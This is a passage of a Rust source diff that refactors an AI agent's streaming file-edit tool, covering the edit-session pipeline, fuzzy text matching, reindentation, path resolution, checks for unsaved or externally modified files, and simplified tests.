output.to_string().into() - } -} - -pub struct StreamingEditFileTool { - thread: WeakEntity, - language_registry: Arc, - project: Entity, -} - -impl StreamingEditFileTool { - pub fn new( - project: Entity, - thread: WeakEntity, - language_registry: Arc, - ) -> Self { - Self { - project, - thread, - language_registry, - } - } - - fn authorize( - &self, - path: &PathBuf, - description: &str, - event_stream: &ToolCallEventStream, - cx: &mut App, - ) -> Task> { - super::tool_permissions::authorize_file_edit( - EditFileTool::NAME, - path, - description, - &self.thread, - event_stream, - cx, - ) - } -} - -impl AgentTool for StreamingEditFileTool { - type Input = StreamingEditFileToolInput; - type 
Output = StreamingEditFileToolOutput; - - const NAME: &'static str = "streaming_edit_file"; - - fn supports_input_streaming() -> bool { - true - } - - fn kind() -> acp::ToolKind { - acp::ToolKind::Edit + fn kind() -> acp::ToolKind { + acp::ToolKind::Edit } fn initial_title( @@ -816,11 +491,11 @@ impl AgentTool for StreamingEditFileTool { .read(cx) .short_full_path_for_project_path(&project_path, cx) }) - .unwrap_or(input.path) + .unwrap_or(input.path.to_string_lossy().into_owned()) .into(), Err(raw_input) => { - if let Some(input) = - serde_json::from_value::(raw_input).ok() + if let Ok(input) = + serde_json::from_value::(raw_input) { let path = input.path.unwrap_or_default(); let path = path.trim(); @@ -857,31 +532,41 @@ impl AgentTool for StreamingEditFileTool { cx: &mut App, ) -> Task> { cx.spawn(async move |cx: &mut AsyncApp| { - let mut state = StreamingEditState::Idle; - loop { - futures::select! { - partial = input.recv_partial().fuse() => { - let Some(partial_value) = partial else { break }; - if let Ok(parsed) = serde_json::from_value::(partial_value) { - state.process(parsed, &self, &event_stream, cx).await?; - } - } - _ = event_stream.cancelled_by_user().fuse() => { - return Err(StreamingEditFileToolOutput::Error { - error: "Edit cancelled by user".to_string(), - }); - } + match self + .process_streaming_edits(&mut input, &event_stream, cx) + .await + { + EditSessionResult::Completed(session) => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (new_text, diff) = session.compute_new_text_and_diff(cx).await; + Ok(StreamingEditFileToolOutput::Success { + old_text: session.old_text.clone(), + new_text, + input_path: session.input_path, + diff, + }) + } + EditSessionResult::Failed { + error, + session: Some(session), + } => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (_new_text, diff) = session.compute_new_text_and_diff(cx).await; + Err(StreamingEditFileToolOutput::Error { + error, + input_path: Some(session.input_path), + 
diff, + }) } + EditSessionResult::Failed { + error, + session: None, + } => Err(StreamingEditFileToolOutput::Error { + error, + input_path: None, + diff: String::new(), + }), } - let full_input = - input - .recv() - .await - .map_err(|e| StreamingEditFileToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), - })?; - - state.finalize(full_input, &self, &event_stream, cx).await }) } @@ -915,207 +600,628 @@ impl AgentTool for StreamingEditFileTool { } } -fn apply_edits( - buffer: &Entity, - action_log: &Entity, - edits: &[EditOperation], - diff: &Entity, - event_stream: &ToolCallEventStream, - abs_path: &PathBuf, - cx: &mut AsyncApp, -) -> Result<()> { - let mut failed_edits = Vec::new(); - let mut ambiguous_edits = Vec::new(); - let mut resolved_edits: Vec<(Range, String)> = Vec::new(); - - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - for (index, edit) in edits.iter().enumerate() { - match resolve_and_reveal_edit(buffer, diff, &snapshot, edit, cx) { - Ok((range, new_text)) => { - resolved_edits.push((range, new_text)); - } - Err(EditResolveError::NotFound) => { - failed_edits.push(index); - } - Err(EditResolveError::Ambiguous(ranges)) => { - ambiguous_edits.push((index, ranges)); - } - } - } - - if !failed_edits.is_empty() { - let indices = failed_edits - .iter() - .map(|i| i.to_string()) - .collect::>() - .join(", "); - anyhow::bail!( - "Could not find matching text for edit(s) at index(es): {}. \ - The old_text did not match any content in the file. \ - Please read the file again to get the current content.", - indices - ); - } - - if !ambiguous_edits.is_empty() { - let details: Vec = ambiguous_edits - .iter() - .map(|(index, ranges)| { - let lines = ranges - .iter() - .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) - .collect::>() - .join(", "); - format!("edit {}: matches at lines {}", index, lines) - }) - .collect(); - anyhow::bail!( - "Some edits matched multiple locations in the file:\n{}. 
\ - Please provide more context in old_text to uniquely identify the location.", - details.join("\n") - ); - } +pub struct EditSession { + abs_path: PathBuf, + input_path: PathBuf, + buffer: Entity, + old_text: Arc, + diff: Entity, + mode: StreamingEditFileMode, + parser: ToolEditParser, + pipeline: EditPipeline, + _finalize_diff_guard: Deferred>, +} - let mut edits_sorted = resolved_edits; - edits_sorted.sort_by(|a, b| a.0.start.cmp(&b.0.start)); +struct EditPipeline { + current_edit: Option, + content_written: bool, +} - if let Some((first_range, _)) = edits_sorted.first() { - let line = snapshot.offset_to_point(first_range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new() - .locations(vec![ToolCallLocation::new(abs_path).line(Some(line))]), - ); - } +enum EditPipelineEntry { + ResolvingOldText { + matcher: StreamingFuzzyMatcher, + }, + StreamingNewText { + streaming_diff: StreamingDiff, + edit_cursor: usize, + reindenter: Reindenter, + original_snapshot: text::BufferSnapshot, + }, +} - for window in edits_sorted.windows(2) { - if let [(earlier_range, _), (later_range, _)] = window - && (earlier_range.end > later_range.start || earlier_range.start == later_range.start) - { - let earlier_start_line = snapshot.offset_to_point(earlier_range.start).row + 1; - let earlier_end_line = snapshot.offset_to_point(earlier_range.end).row + 1; - let later_start_line = snapshot.offset_to_point(later_range.start).row + 1; - let later_end_line = snapshot.offset_to_point(later_range.end).row + 1; - anyhow::bail!( - "Conflicting edit ranges detected: lines {}-{} conflicts with lines {}-{}. 
\ - Conflicting edit ranges are not allowed, as they would overwrite each other.", - earlier_start_line, - earlier_end_line, - later_start_line, - later_end_line, - ); +impl EditPipeline { + fn new() -> Self { + Self { + current_edit: None, + content_written: false, } } - if !edits_sorted.is_empty() { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit( - edits_sorted - .iter() - .map(|(range, new_text)| (range.clone(), new_text.as_str())), - None, - cx, - ); + fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { + if self.current_edit.is_none() { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.current_edit = Some(EditPipelineEntry::ResolvingOldText { + matcher: StreamingFuzzyMatcher::new(snapshot), }); - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - }); + } } - - Ok(()) -} - -enum EditResolveError { - NotFound, - Ambiguous(Vec>), } -/// Resolves an edit operation by finding matching text in the buffer, -/// reveals the matched range in the diff view, and returns the resolved -/// range and replacement text. 
-fn resolve_and_reveal_edit( - buffer: &Entity, - diff: &Entity, - snapshot: &BufferSnapshot, - edit: &EditOperation, - cx: &mut AsyncApp, -) -> std::result::Result<(Range, String), EditResolveError> { - let mut matcher = StreamingFuzzyMatcher::new(snapshot.clone()); - matcher.push(&edit.old_text, None); - let matches = matcher.finish(); - if matches.is_empty() { - return Err(EditResolveError::NotFound); - } - if matches.len() > 1 { - return Err(EditResolveError::Ambiguous(matches)); - } +impl EditSession { + async fn new( + path: PathBuf, + display_description: &str, + mode: StreamingEditFileMode, + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result { + let project_path = cx.update(|cx| resolve_path(mode, &path, &tool.project, cx))?; - let range = matches.into_iter().next().expect("checked len above"); + let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) + else { + return Err(format!( + "Worktree at '{}' does not exist", + path.to_string_lossy() + )); + }; - let anchor_range = - buffer.read_with(cx, |buffer, _cx| buffer.anchor_range_between(range.clone())); - diff.update(cx, |card, cx| card.reveal_range(anchor_range, cx)); + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), + ); - Ok((range, edit.new_text.clone())) -} + cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) + .await + .map_err(|e| e.to_string())?; -fn resolve_path( - mode: StreamingEditFileMode, - path: &PathBuf, - project: &Entity, - cx: &mut App, -) -> Result { - let project = project.read(cx); + let buffer = tool + .project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .map_err(|e| e.to_string())?; - match mode { - StreamingEditFileMode::Edit | StreamingEditFileMode::Overwrite => { - let path = project - .find_project_path(&path, cx) - .context("Can't edit file: path not found")?; + 
ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - let entry = project - .entry_for_path(&path, cx) - .context("Can't edit file: path not found")?; + let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); + event_stream.update_diff(diff.clone()); + let finalize_diff_guard = util::defer(Box::new({ + let diff = diff.downgrade(); + let mut cx = cx.clone(); + move || { + diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); + } + }) as Box); + + tool.action_log.update(cx, |log, cx| match mode { + StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx), + StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx), + }); + + let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let old_text = cx + .background_spawn({ + let old_snapshot = old_snapshot.clone(); + async move { Arc::new(old_snapshot.text()) } + }) + .await; + + Ok(Self { + abs_path, + input_path: path, + buffer, + old_text, + diff, + mode, + parser: ToolEditParser::default(), + pipeline: EditPipeline::new(), + _finalize_diff_guard: finalize_diff_guard, + }) + } + + async fn finalize( + &mut self, + input: StreamingEditFileToolInput, + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match input.mode { + StreamingEditFileMode::Write => { + let content = input + .content + .ok_or_else(|| "'content' field is required for write mode".to_string())?; + + let events = self.parser.finalize_content(&content); + self.process_events(&events, tool, event_stream, cx)?; + } + StreamingEditFileMode::Edit => { + let edits = input + .edits + .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; + let events = self.parser.finalize_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + + if log::log_enabled!(log::Level::Debug) { + log::debug!("Got edits:"); + for edit in &edits { + log::debug!( + " old_text: '{}', new_text: '{}'", + edit.old_text.replace('\n', "\\n"), + 
edit.new_text.replace('\n', "\\n") + ); + } + } + } + } + Ok(()) + } + + async fn compute_new_text_and_diff(&self, cx: &mut AsyncApp) -> (String, String) { + let new_snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let (new_text, unified_diff) = cx + .background_spawn({ + let new_snapshot = new_snapshot.clone(); + let old_text = self.old_text.clone(); + async move { + let new_text = new_snapshot.text(); + let diff = language::unified_diff(&old_text, &new_text); + (new_text, diff) + } + }) + .await; + (new_text, unified_diff) + } - anyhow::ensure!(entry.is_file(), "Can't edit file: path is a directory"); - Ok(path) + fn process( + &mut self, + partial: StreamingEditFileToolPartialInput, + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match &self.mode { + StreamingEditFileMode::Write => { + if let Some(content) = &partial.content { + let events = self.parser.push_content(content); + self.process_events(&events, tool, event_stream, cx)?; + } + } + StreamingEditFileMode::Edit => { + if let Some(edits) = partial.edits { + let events = self.parser.push_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + } + } } + Ok(()) + } - StreamingEditFileMode::Create => { - if let Some(path) = project.find_project_path(&path, cx) { - anyhow::ensure!( - project.entry_for_path(&path, cx).is_none(), - "Can't create file: file already exists" - ); + fn process_events( + &mut self, + events: &[ToolEditEvent], + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + for event in events { + match event { + ToolEditEvent::ContentChunk { chunk } => { + let (buffer_id, buffer_len) = self + .buffer + .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); + let edit_range = if self.pipeline.content_written { + buffer_len..buffer_len + } else { + 0..buffer_len + }; + + agent_edit_buffer( + &self.buffer, + 
[(edit_range, chunk.as_str())], + &tool.action_log, + cx, + ); + cx.update(|cx| { + tool.set_agent_location( + self.buffer.downgrade(), + text::Anchor::max_for_buffer(buffer_id), + cx, + ); + }); + self.pipeline.content_written = true; + } + + ToolEditEvent::OldTextChunk { + chunk, done: false, .. + } => { + log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + && !chunk.is_empty() + { + if let Some(match_range) = matcher.push(chunk, None) { + let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { + buffer.anchor_range_outside(match_range.clone()) + }); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(match_range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + + ToolEditEvent::OldTextChunk { + edit_index, + chunk, + done: true, + } => { + log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); + + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + else { + continue; + }; + + if !chunk.is_empty() { + matcher.push(chunk, None); + } + let range = extract_match(matcher.finish(), &self.buffer, edit_index, cx)?; + + let anchor_range = self + .buffer + .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + + let line = snapshot.offset_to_point(range.start).row; + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ + ToolCallLocation::new(&self.abs_path).line(Some(line)), + ]), + ); + + let buffer_indent = snapshot.line_indent_for_row(line); + let 
query_indent = text::LineIndent::from_iter( + matcher + .query_lines() + .first() + .map(|s| s.as_str()) + .unwrap_or("") + .chars(), + ); + let indent_delta = compute_indent_delta(buffer_indent, query_indent); + + let old_text_in_buffer = + snapshot.text_for_range(range.clone()).collect::(); + + log::debug!( + "edit[{}] old_text matched at {}..{}: {:?}", + edit_index, + range.start, + range.end, + old_text_in_buffer, + ); + + let text_snapshot = self + .buffer + .read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { + streaming_diff: StreamingDiff::new(old_text_in_buffer), + edit_cursor: range.start, + reindenter: Reindenter::new(indent_delta), + original_snapshot: text_snapshot, + }); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: false, .. + } => { + log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + streaming_diff, + edit_cursor, + reindenter, + original_snapshot, + .. + }) = &mut self.pipeline.current_edit + else { + continue; + }; + + let reindented = reindenter.push(chunk); + if reindented.is_empty() { + continue; + } + + let char_ops = streaming_diff.push_new(&reindented); + apply_char_operations( + &char_ops, + &self.buffer, + original_snapshot, + edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(*edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: true, .. 
+ } => { + log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + mut streaming_diff, + mut edit_cursor, + mut reindenter, + original_snapshot, + }) = self.pipeline.current_edit.take() + else { + continue; + }; + + // Flush any remaining reindent buffer + final chunk. + let mut final_text = reindenter.push(chunk); + final_text.push_str(&reindenter.finish()); + + log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); + + if !final_text.is_empty() { + let char_ops = streaming_diff.push_new(&final_text); + apply_char_operations( + &char_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + } + + let remaining_ops = streaming_diff.finish(); + apply_char_operations( + &remaining_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + Ok(()) + } +} + +fn apply_char_operations( + ops: &[CharOperation], + buffer: &Entity, + snapshot: &text::BufferSnapshot, + edit_cursor: &mut usize, + action_log: &Entity, + cx: &mut AsyncApp, +) { + for op in ops { + match op { + CharOperation::Insert { text } => { + let anchor = snapshot.anchor_after(*edit_cursor); + agent_edit_buffer(&buffer, [(anchor..anchor, text.as_str())], action_log, cx); + } + CharOperation::Delete { bytes } => { + let delete_end = *edit_cursor + bytes; + let anchor_range = snapshot.anchor_range_inside(*edit_cursor..delete_end); + agent_edit_buffer(&buffer, [(anchor_range, "")], action_log, cx); + *edit_cursor = delete_end; + } + CharOperation::Keep { bytes } => { + *edit_cursor += bytes; + } + } + } +} + +fn extract_match( + matches: Vec>, + buffer: &Entity, + edit_index: &usize, + cx: &mut AsyncApp, +) -> Result, String> { + match matches.len() { + 0 => Err(format!( + "Could not find matching 
text for edit at index {}. \ + The old_text did not match any content in the file. \ + Please read the file again to get the current content.", + edit_index, + )), + 1 => Ok(matches.into_iter().next().unwrap()), + _ => { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let lines = matches + .iter() + .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) + .collect::>() + .join(", "); + Err(format!( + "Edit {} matched multiple locations in the file at lines: {}. \ + Please provide more context in old_text to uniquely \ + identify the location.", + edit_index, lines + )) + } + } +} + +/// Edits a buffer and reports the edit to the action log in the same effect +/// cycle. This ensures the action log's subscription handler sees the version +/// already updated by `buffer_edited`, so it does not misattribute the agent's +/// edit as a user edit. +fn agent_edit_buffer( + buffer: &Entity, + edits: I, + action_log: &Entity, + cx: &mut AsyncApp, +) where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, +{ + cx.update(|cx| { + buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); +} + +fn ensure_buffer_saved( + buffer: &Entity, + abs_path: &PathBuf, + tool: &StreamingEditFileTool, + cx: &mut AsyncApp, +) -> Result<(), String> { + let last_read_mtime = tool + .action_log + .read_with(cx, |log, _| log.file_read_time(abs_path)); + let check_result = tool.thread.read_with(cx, |thread, cx| { + let current = buffer + .read(cx) + .file() + .and_then(|file| file.disk_state().mtime()); + let dirty = buffer.read(cx).is_dirty(); + let has_save = thread.has_tool(SaveFileTool::NAME); + let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); + (current, dirty, has_save, has_restore) + }); + + let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { + return Ok(()); + }; + + if is_dirty { + let message = match 
(has_save_tool, has_restore_tool) { + (true, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (true, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." + } + (false, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (false, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ + then ask them to save or revert the file manually and inform you when it's ok to proceed." + } + }; + return Err(message.to_string()); + } + + if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { + if current != last_read { + return Err("The file has been modified since you last read it. \ + Please read the file again to get the current state before editing it." 
+ .to_string()); + } + } + + Ok(()) +} + +fn resolve_path( + mode: StreamingEditFileMode, + path: &PathBuf, + project: &Entity, + cx: &mut App, +) -> Result { + let project = project.read(cx); + + match mode { + StreamingEditFileMode::Edit => { + let path = project + .find_project_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + let entry = project + .entry_for_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + if entry.is_file() { + Ok(path) + } else { + Err("Can't edit file: path is a directory".to_string()) + } + } + StreamingEditFileMode::Write => { + if let Some(path) = project.find_project_path(&path, cx) + && let Some(entry) = project.entry_for_path(&path, cx) + { + if entry.is_file() { + return Ok(path); + } else { + return Err("Can't write to file: path is a directory".to_string()); + } } - let parent_path = path.parent().context("Can't create file: incorrect path")?; + let parent_path = path + .parent() + .ok_or_else(|| "Can't create file: incorrect path".to_string())?; let parent_project_path = project.find_project_path(&parent_path, cx); let parent_entry = parent_project_path .as_ref() .and_then(|path| project.entry_for_path(path, cx)) - .context("Can't create file: parent directory doesn't exist")?; + .ok_or_else(|| "Can't create file: parent directory doesn't exist")?; - anyhow::ensure!( - parent_entry.is_dir(), - "Can't create file: parent is not a directory" - ); + if !parent_entry.is_dir() { + return Err("Can't create file: parent is not a directory".to_string()); + } let file_name = path .file_name() .and_then(|file_name| file_name.to_str()) .and_then(|file_name| RelPath::unix(file_name).ok()) - .context("Can't create file: invalid filename")?; + .ok_or_else(|| "Can't create file: invalid filename".to_string())?; let new_file_path = parent_project_path.map(|parent| ProjectPath { path: parent.path.join(file_name), ..parent }); - new_file_path.context("Can't create file") + 
new_file_path.ok_or_else(|| "Can't create file".to_string()) } } } @@ -1137,42 +1243,17 @@ mod tests { #[gpui::test] async fn test_streaming_edit_create_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Create new file".into(), - path: "root/dir/new_file.txt".into(), - mode: StreamingEditFileMode::Create, - content: Some("Hello, World!".into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -1188,43 +1269,18 @@ mod tests { #[gpui::test] async fn test_streaming_edit_overwrite_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"file.txt": "old content"})) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let 
language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old content"})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Overwrite file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Overwrite, - content: Some("new content".into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Overwrite file".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("new content".into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -1243,51 +1299,21 @@ mod tests { #[gpui::test] async fn test_streaming_edit_granular_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), 
- context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![EditOperation { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit lines".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), ToolCallEventStream::test().0, cx, ) @@ -1301,58 +1327,31 @@ mod tests { } #[gpui::test] - async fn test_streaming_edit_multiple_nonoverlapping_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + async fn test_streaming_edit_multiple_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), 
- context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit multiple lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - EditOperation { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit multiple lines".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + ]), + }), ToolCallEventStream::test().0, cx, ) @@ -1370,57 +1369,30 @@ mod tests { #[gpui::test] async fn test_streaming_edit_adjacent_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - 
context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit adjacent lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }, - EditOperation { - old_text: "line 3".into(), - new_text: "modified line 3".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit adjacent lines".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }, + Edit { + old_text: "line 3".into(), + new_text: "modified line 3".into(), + }, + ]), + }), ToolCallEventStream::test().0, cx, ) @@ -1438,57 +1410,30 @@ mod tests { #[gpui::test] async fn 